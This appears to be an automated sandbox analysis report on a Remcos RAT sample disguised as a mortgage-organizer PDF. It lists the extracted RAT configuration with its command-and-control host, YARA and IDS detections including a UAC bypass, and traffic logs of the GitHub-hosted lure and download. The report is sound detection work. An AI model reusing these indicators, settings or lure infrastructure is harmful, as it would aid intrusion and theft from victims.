Malware Configuration Extractor: Remcos {"Host:Port:Password": "privmerkt.com:9583:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-9QRTYQ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2423957132.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2563583207.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 6148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 5652, type: MEMORYSTR

Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_0fe8744f-e

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492, type: MEMORYSTR

Source: https://maveuve.github.io/frlpodf/marynewreleasefax.html

HTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...

Source: https://maveuve.github.io/frlpodf/marynewreleasefax.html	HTTP Parser: No favicon
Source: https://maveuve.github.io/frlpodf/marynewreleasefax.html	HTTP Parser: No favicon
Source: https://maveuve.github.io/frlpodf/marynewreleasefax.html	HTTP Parser: No favicon
Source: https://maveuve.github.io/frlpodf/marynewreleasefax.html	HTTP Parser: No favicon

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe

Unpacked PE file: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49749 version: TLS 1.2

Source:	Binary string: /app/crashsubmit?appname=SumatraPDFhttp://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5.3.0.pdbSumatraPDF.pdblibmupdf.pdbSumatraPDF-no-MuPDF.pdbhttp://kjkpub.s3.amazonaws.com/sumatrapdf/prerel/SumatraPDF-prerelease-SVN_PRE_RELEASE_VER.pdb.zipsymbols_tmp.ziphttp://kjkpub.s3.amazonaws.com/sumatrapdf/rel/SumatraPDF-1.5.3.0.pdb.zipsymbols_tmp.zipSUMATRAPDF_FULLDUMPHaihaisoft PDF Reader crashedSorry, that shouldn't have happened! source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: SumatraPDF-no-MuPDF.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: SumatraPDF-1.5.3.0.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: E:\building\360project\360sd\branches\beta\Build\x86\WhiteCache.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.000000001013D000.00000002.00000001.01000000.00000005.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.000000001039B000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\_AppDiscovery_AppDiscovery_1.3.0@2\dev\AppDiscovery_scanner\scanner\src\ADScan\Release\bin\ADScan\ADScan.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: xOdx>a0m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: libmupdf.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.16:49763 -> 172.111.163.227:9583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.16:49764 -> 172.111.163.227:9583
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.16:49767 -> 45.74.48.2:9774

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: privmerkt.com

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: github.com to https://raw.githubusercontent.com/maveuve/vbdsz/refs/heads/main/marys%20organizer%202023%20release.zip
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: github.com to https://raw.githubusercontent.com/maveuve/vbdsz/refs/heads/main/marys%20organizer%202023%20release.zip

Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.16:49765 -> 178.237.33.50:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.16:49768 -> 178.237.33.50:80

Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26

Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /frlpodf/marynewreleasefax.html HTTP/1.1Host: maveuve.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bootstrap/4.3.1/css/bootstrap.min.css HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://maveuve.github.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://maveuve.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?compat=recaptcha HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://maveuve.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://maveuve.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://maveuve.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8c8c7ad8c96941a6&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: maveuve.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://maveuve.github.io/frlpodf/marynewreleasefax.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8c8c7ad8c96941a6&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8c8c7ad8c96941a6/1727282678369/d41a30965b817c48f2b8012ecc5d4118160944ab876415a0adeddf7d6fb64e62/cwl0dNi4gO4wp8F HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8c8c7ad8c96941a6/1727282678373/4K3pZlDmL6zt7ib HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8c8c7ad8c96941a6/1727282678373/4K3pZlDmL6zt7ib HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=E7m3O887TFWMntR&MD=kMUKRooF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/621320543:1727280800:x-uSLD9blvM2sN0MY5eDk1KX-nemuunHuqvoVAWU97E/8c8c7ad8c96941a6/596e5d08887dcbd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /maveuve/vbdsz/raw/refs/heads/main/Marys%20Organizer%202023%20Release.zip HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://maveuve.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /maveuve/vbdsz/refs/heads/main/Marys%20Organizer%202023%20Release.zip HTTP/1.1Host: raw.githubusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://maveuve.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /frlpodf/marynewreleasefax.html HTTP/1.1Host: maveuve.github.ioConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "66f41242-10f5"If-Modified-Since: Wed, 25 Sep 2024 13:38:10 GMT
